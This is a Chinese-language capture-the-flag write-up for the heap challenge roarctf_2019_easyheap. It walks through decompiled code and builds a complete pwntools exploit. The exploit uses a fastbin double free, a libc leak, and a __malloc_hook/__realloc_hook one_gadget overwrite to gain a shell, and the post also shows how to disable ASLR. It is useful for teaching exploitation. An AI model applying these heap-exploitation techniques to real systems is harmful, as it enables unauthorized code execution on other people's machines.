百航鹿大联训 roarctf_2019_easyheap

我现在心如死灰，面如平湖，胸有惊雷。
这里面水太深，你把握不住。😅
checksec是NO PIE的。

---

来看代码。同样改了改函数名。

__int64 __fastcall main(int a1, char **a2, char **a3)
{int v3; // eaxint v4; // ebxint v6; // [rsp+4h] [rbp-14h] BYREFunsigned __int64 v7; // [rsp+8h] [rbp-10h]v7 = __readfsqword(0x28u);v6 = 0;setvbuf(stdin, 0LL, 2, 0LL);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stderr, 0LL, 2, 0LL);v3 = open("/dev/random", 0);if ( v3 == -1 ){puts("open file error!");exit(0);}v4 = v3;if ( (int)read(v3, &qword_602090, 8uLL) < 0|| (close(v4),sub_400CA0(),_printf_chk(1LL, (__int64)"please input your username:"),(int)read(0, &unk_602060, 0x20uLL) < 0)|| (_printf_chk(1LL, (__int64)"please input your info:"), (int)read(0, &unk_6020A0, 0x20uLL) < 0) ){puts("read error");exit(0);}while ( 1 ){while ( 1 ){while ( 1 ){while ( 1 ){menu();if ( (int)_isoc99_scanf("%d", &v6) < 0 ){puts("scanf error");exit(0);}if ( v6 != 1 )break;add();}if ( v6 != 2 )break;free(buf);                              // UAF&double free}if ( v6 != 3 )break;if ( qword_602090 == 0xDEADBEEFDEADBEEFLL )show();}if ( v6 == 4 )break;if ( v6 == 666 )wtf();}return 0LL;
}

主函数，一上来会让你输个用户名和信息，不知道何意味。
很容易看出free那一步有UAF和double free可以利用。show可以泄漏信息，但是有个qword_602090 == 0xDEADBEEFDEADBEEFLL的要求。由于NO PIE，就是要改地址0x602090。
输666还有个后门函数。

unsigned __int64 add()
{int v0; // eaxsize_t v1; // rbxchar v3[8]; // [rsp+0h] [rbp-18h] BYREFunsigned __int64 v4; // [rsp+8h] [rbp-10h]v4 = __readfsqword(0x28u);if ( qword_602018 ){puts("input the size");if ( (int)read(0, v3, 8uLL) < 0 )goto LABEL_8;v0 = strtol(v3, 0LL, 10);if ( v0 > 128 ){puts("invaild size");exit(0);}v1 = v0;buf = (char *)malloc(v0);puts("please input your content");if ( (int)read(0, buf, v1) < 0 ){
LABEL_8:puts("read error");exit(0);}--qword_602018;}else{puts("chunk filled!\n");puts("everything has a price");}return __readfsqword(0x28u) ^ v4;
}

虽然限制了堆的大小，但是128刚好是0x80，可以进unsorted bin。
这里只能一个堆反复用，不像别的题一样是数组，限制还是比较大的。

int sub_400C40()
{puts(buf);puts("everything has a price");close(1);return close(2);
}

泄漏。这里有两个混乱邪恶的命令close(1)和close(2)，关掉了stdout和stderr，只保留stdin。也就是说泄漏信息之后你可以正常输入，但是终端没法接收到任何输出。极度影响调试。

unsigned __int64 wtf()
{int v0; // eaxchar v2[8]; // [rsp+0h] [rbp-18h] BYREFunsigned __int64 v3; // [rsp+8h] [rbp-10h]v3 = __readfsqword(0x28u);if ( !qword_602010 ){puts("everything has a price");             // 负数？goto LABEL_7;}puts("build or free?");if ( (int)read(0, v2, 8uLL) < 0 ){
LABEL_10:puts("read error");exit(0);}v0 = strtol(v2, 0LL, 10);if ( v0 == 1 ){ptr = calloc(0xA0uLL, 1uLL);puts("please input your content");if ( (int)read(0, ptr, 0xA0uLL) >= 0 )goto LABEL_7;goto LABEL_10;}if ( v0 == 2 )free(ptr);elseputs("invaild choice");
LABEL_7:--qword_602010;return __readfsqword(0x28u) ^ v3;
}

后门可以开和删另一个堆，不过强制大小为0xa0。所以我们只能自由支配两个堆，这个大堆必须利用好。
另外这玩意儿有个招笑计数器，到 0 之后还会减一变成负数，之后就无限用了。令人汗颜。

---

泄漏只需要free一个0x80的chunk进unsorted bin。然而在此之前得想办法修改那个qword_602090。
大方向确定为利用fastbin double free。我们知道，fast bin是一种非常脆弱的结构，检查double free只会检查头节点。
也就是说对于fastbin->x->y这种东西，我们可以再次free y，然后y会指向头节点，形成fastbin->y->x->y，这样我们能两次取得y这个chunk了。把y的fd改成0x602090-0x10，制造fake chunk来任意写。
实现起来有点难度，咱就两个堆，堆A可以自由申请，但堆B必定是0xa0进不了fast bin，怎么办呢。
把这个0xa0释放之后，申请一个0x60的堆A就行了，会直接从那个0xa0（或者Top chunk，如果合并了的话）分裂，此时A和B都指向同一地址，堆B就可以控制fast bin chunk了。
对于fake chunk，要求满足fast bin的size检查。发现0x602090的上游恰好是用户名，一开始输入一个fake chunk header就好。
注释里是血与泪的教训……

def init():io.sendlineafter("please input your username:",p64(0)+p64(0x71))'''prev_size=0,size=0x71这里不要用sendlineafter!不要用sendlineafter!不要用sendlineafter!否则字符串末尾会自动添加一个'\n'（0xa），这会被视作fake chunk的fd取走fake chunk时，fast bin里会留下一个地址为0xa的神秘chunk，并在后续导致不明段错误别问我怎么知道的，不信可以自己试试'''io.sendlineafter("please input your info:","wtfisthis")#随便输
def add(size,content):io.sendlineafter(">> ",str(1))io.sendlineafter("input the size",str(size))io.sendlineafter("please input your content",content)
def delete():io.sendlineafter(">> ",str(2))
def show():io.sendlineafter(">> ",str(3))
def wtf():io.sendlineafter(">> ",str(666))
def wtf1(content):wtf()io.sendlineafter("build or free?",str(1))io.sendlineafter("please input your content",content)
def wtf2():wtf()io.sendlineafter("build or free?",str(2))
init()#构造fake header
wtf1("aaaa")
wtf2()
add(0x60,"aaaa")#分裂，此时两个堆地址相同，都是0x60的chunk
add(0x60,"bbbb")
wtf2()#fastbin->x
delete()#fastbin->x->y
wtf()#这里后门计数器变0了，需要额外问一次（大病一般的）
wtf2()#fastbin->x->y->x(double free)
add(0x60,p64(0x602060))#fastbin->y->x->fake
add(0x60,"bbbb")#fastbin->x->fake
add(0x60,"aaaa")#fastbin->fake
add(0x60,p8(0)*0x20+p64(0xDEADBEEFDEADBEEF))#对fake chunk任意写，然后就可以show了
add(0x80,"unsorted")
wtf1("Fan_shengHandsome")#给刚开的unsorted bin chunk垫背，防止与Top chunk合并
delete()
show()
libc_addr=u64(io.recvline().strip()[:8].ljust(8,b'\0'))-0x3c3b78

---

攻击也是如法炮制double free。但是黑心出题人关了输出，我们得把所有recvuntil换成sleep(0.5)。
这里one_dadget只能用0xf0897那个，而且要先利用realloc调整堆栈。因为one_dadget对栈布局有很严格的要求，必须满足一定限制条件才能用，否则就exit code 127。
而realloc开头有很多栈调整命令：

realloc:push   r15push   r14push   r13push   r12push   rbppush   rbxsub    rsp, 0x18...

我们可以把__malloc_hook改为realloc+offset，并把__realloc_hook（刚好在__malloc_hook上游8字节）改为one_dadget。
这样，执行malloc时会先跳到realloc+offset，执行那里的栈调整命令，让栈布局合适；接着往下走，执行realloc_hook，触发one_dadget。
什么？offset是多少？我怎么知道栈布局有没有可能合适，什么时候合适？别问鼠鼠，鼠鼠也不知道，暴力测试或者偷看答案可得 offset=0x14。
然后要解决那个很坑的close(1)，不然拿到shell也看不到结果。网上很多人说的exec 1>&0亲测没用，0（stdin）是只读的不能改，执行之后ls、cat之类的全都用不了了。
使用exec 1>/dev/tty可以把标准输出重定向到终端。浪费我好久时间，我要哭了。

def exadd(size,content):sleep(0.5)io.sendline(str(1))sleep(0.5)io.sendline(str(size))sleep(0.5)io.sendline(content)
def exdelete():sleep(0.5)io.sendline(str(2))
def exwtf():sleep(0.5)io.sendline(str(666))
def exwtf1(content):exwtf()sleep(0.5)io.sendline(str(1))sleep(0.5)io.sendline(content)
def exwtf2():exwtf()sleep(0.5)io.sendline(str(2))
exadd(0x80,"Fan_shengHandsome")#取走之前碍事的垫背石，否则后续会产生small bin这些奇怪东西影响结果
exwtf1("aaaa")#重复一遍之前的过程
exwtf2()
exadd(0x60,"aaaa")
exadd(0x60,"bbbb")
exwtf2()
exdelete()
exwtf2()
exadd(0x60,p64(libc_addr+0x3c3aed))#这个偏移参见上一篇babyheap的博客
exadd(0x60,"bbbb")
exadd(0x60,"aaaa")
exadd(0x60,b'\0'*(0x13-8)+p64(libc_addr+0xf0897)+p64(libc_addr+0x83c40+0x14))
'''
__realloc_hook刚好在__malloc_hook上游8字节，直接一起改了
经测试只能使用+0xf0897这个one_dadget和+0x14的realloc偏移
'''
exwtf1("exec 1>/dev/tty")#恢复输出到终端
io.interactive()

另外说一句，非常不建议关着输出进行调试。
可以使用sysctl -w kernel.randomize_va_space=0命令临时关闭ASLR随机化，libc基址就固定了。重启后会恢复。
0表示关闭，1表示半开启，2表示全开。

---

完整代码

from pwn import *
context.log_level="debug"
io=process("./roarctf_2019_easyheap")
libc=ELF("/home/fslinux/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6")
def init():io.sendlineafter("please input your username:",p64(0)+p64(0x71))io.sendlineafter("please input your info:","wtfisthis")#随便输
def add(size,content):io.sendlineafter(">> ",str(1))io.sendlineafter("input the size",str(size))io.sendlineafter("please input your content",content)
def delete():io.sendlineafter(">> ",str(2))
def show():io.sendlineafter(">> ",str(3))
def wtf():io.sendlineafter(">> ",str(666))
def wtf1(content):wtf()io.sendlineafter("build or free?",str(1))io.sendlineafter("please input your content",content)
def wtf2():wtf()io.sendlineafter("build or free?",str(2))
def exadd(size,content):sleep(0.5)io.sendline(str(1))sleep(0.5)io.sendline(str(size))sleep(0.5)io.sendline(content)
def exdelete():sleep(0.5)io.sendline(str(2))
def exwtf():sleep(0.5)io.sendline(str(666))
def exwtf1(content):exwtf()sleep(0.5)io.sendline(str(1))sleep(0.5)io.sendline(content)
def exwtf2():exwtf()sleep(0.5)io.sendline(str(2))
init()
wtf1("aaaa")
wtf2()
add(0x60,"aaaa")
add(0x60,"bbbb")
wtf2()
delete()
wtf()
wtf2()
add(0x60,p64(0x602060))
add(0x60,"bbbb")
add(0x60,"aaaa")
add(0x60,p8(0)*0x20+p64(0xDEADBEEFDEADBEEF))
add(0x80,"unsorted")
wtf1("Fan_shengHandsome")
delete()
show()
libc_addr=u64(io.recvline().strip()[:8].ljust(8,b'\0'))-0x3c3b78
exadd(0x80,"Fan_shengHandsome")
exwtf1("aaaa")
exwtf2()
exadd(0x60,"aaaa")
exadd(0x60,"bbbb")
exwtf2()
exdelete()
exwtf2()
exadd(0x60,p64(libc_addr+0x3c3aed))
exadd(0x60,"bbbb")
exadd(0x60,"aaaa")
exadd(0x60,b'\0'*(0x13-8)+p64(libc_addr+0xf0897)+p64(libc_addr+0x83c40+0x14))
exwtf1("exec 1>/dev/tty")
io.interactive()